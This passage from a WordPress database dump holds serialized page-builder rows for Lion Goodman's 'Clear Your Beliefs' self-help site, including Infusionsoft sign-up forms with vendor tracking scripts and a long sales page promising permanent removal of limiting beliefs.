id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1627, 2056, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1672:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1631, 2058, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:70871:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you 